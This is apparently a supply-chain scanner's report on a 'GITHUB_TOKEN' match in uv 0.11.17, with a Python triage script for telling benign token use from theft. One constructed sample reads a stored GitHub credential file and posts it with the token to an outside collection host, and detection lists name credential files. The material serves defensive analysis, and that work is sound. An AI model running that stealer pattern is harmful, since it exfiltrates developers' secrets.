PkgRadar

PyPI · pypi.org

uv

Credential file access: matched "GITHUB_TOKEN"

Why PkgRadar flagged 0.11.17

Severity  Signal                  Evidence
medium    Credential file access  matched "GITHUB_TOKEN" · uv-0.11.17/crates/uv-python/fetch-download-metadata.py

This is a string match, not an observed behaviour: the evidence shows that the identifier GITHUB_TOKEN appears in a Python script in the source tree, not that a token is read from a credential file or sent anywhere. Before acting on it, open the matched file and check three things: where the value comes from (an environment variable versus a stored credential file such as ~/.config/gh/hosts.yml), which host it is sent to, and whether the script runs at build or install time at all. Later versions score 0 on the same scan; confirm whether the file changed or the rule did before treating the signal as resolved.
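The triage described above, as an added example that is not PkgRadar's scanner or uv's code: it scans Python source for credential identifiers, then classifies the match by whether the token comes from the environment or from a stored credential file and whether it is sent to an expected host. The two sample sources, the host allow-list and the credential-file list are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample sources (not uv's code). BENIGN_SRC reads a token from the
# environment and sends it only to api.github.com; SUSPICIOUS_SRC reads a stored
# credential file and posts it to an unrelated host.
BENIGN_SRC = '''
import os
import urllib.request

def fetch(url):
    req = urllib.request.Request(url)
    token = os.environ.get("GITHUB_TOKEN")
    if token:
        req.add_header("Authorization", f"Bearer {token}")
    return urllib.request.urlopen(req).read()

data = fetch("https://api.github.com/repos/example/repo/releases")
'''

SUSPICIOUS_SRC = '''
import os, json, urllib.request

def grab():
    with open(os.path.expanduser("~/.config/gh/hosts.yml")) as f:
        creds = f.read()
    token = os.environ.get("GITHUB_TOKEN")
    body = json.dumps({"hosts": creds, "GITHUB_TOKEN": token}).encode()
    urllib.request.urlopen("https://203.0.113.7/collect", data=body)

grab()
'''

# Identifiers whose presence raises the "credential access" signal (assumed list).
CREDENTIAL_NAMES = ("GITHUB_TOKEN", "GH_TOKEN", "AWS_SECRET_ACCESS_KEY",
                    "NPM_TOKEN", "PYPI_TOKEN", "TWINE_PASSWORD")
# Files that hold stored credentials on a developer machine (assumed list).
CREDENTIAL_FILES = re.compile(
    r"~/\.(?:config/gh/hosts\.yml|aws/credentials|npmrc|netrc|pypirc|git-credentials)")
# Hosts a GitHub token is legitimately sent to (assumed allow-list).
EXPECTED_HOSTS = {"api.github.com", "github.com", "uploads.github.com"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")
ENV_RE = re.compile(r"os\.environ|os\.getenv|environ\.get")
SEND_RE = re.compile(r"urlopen\(|requests\.(?:post|put|get)\(|socket\.")


@dataclass
class Finding:
    names: list        # credential identifiers found in the source
    env_read: bool     # value taken from the process environment
    file_read: bool    # value taken from a stored credential file
    hosts: list        # hosts named in URL literals
    verdict: str       # clean / low / review / high


def triage(src: str) -> Finding:
    """Classify a credential-identifier match by how the value is obtained and where it goes."""
    names = [n for n in CREDENTIAL_NAMES if n in src]
    env_read = bool(ENV_RE.search(src))
    file_read = bool(CREDENTIAL_FILES.search(src))
    hosts = sorted(set(URL_RE.findall(src)))
    sends = bool(SEND_RE.search(src))
    unexpected = [h for h in hosts if h not in EXPECTED_HOSTS]
    if not names and not file_read:
        verdict = "clean"
    elif file_read and sends and unexpected:
        verdict = "high"      # stored credentials read and shipped to an unexpected host
    elif sends and unexpected:
        verdict = "review"    # token identifier present and traffic to an off-list host
    elif file_read:
        verdict = "review"    # reads stored credentials, no outbound send seen
    else:
        verdict = "low"       # environment read plus expected host: ordinary API auth
    return Finding(names, env_read, file_read, hosts, verdict)


def context(src: str, name: str, width: int = 1) -> list:
    """Return numbered source lines around each occurrence of name, for a human to read."""
    lines = src.splitlines()
    out = []
    for i, line in enumerate(lines):
        if name in line:
            lo, hi = max(0, i - width), min(len(lines), i + width + 1)
            out.append("\n".join(f"{j + 1:4d}: {lines[j]}" for j in range(lo, hi)))
    return out


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SRC), ("suspicious", SUSPICIOUS_SRC)):
        f = triage(src)
        print(f"{label}: verdict={f.verdict} env_read={f.env_read} "
              f"file_read={f.file_read} hosts={f.hosts}")
        for snippet in context(src, "GITHUB_TOKEN"):
            print(snippet)
```

The bare string match raises the same signal on both samples; only the second question (where the value comes from and where it goes) separates a maintainer script authenticating to the GitHub API from a stealer. The hosts the script contacts are usually the fastest discriminator, so check those first when reading the matched file.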

Scanned versions

Version  Verdict   Score  Scanned (UTC)
0.11.21  Low risk  0      2026-06-11
0.11.20  Low risk  0      2026-06-10
0.11.19  Low risk  0      2026-06-03
0.11.18  Low risk  0      2026-06-01
0.11.17  Review    5      2026-05-28

Block this in CI

PkgRadar gates uv (and every other dependency) before the change that introduces it merges. One line in your pipeline:

pkgradar gate --ecosystem pypi uv==0.11.17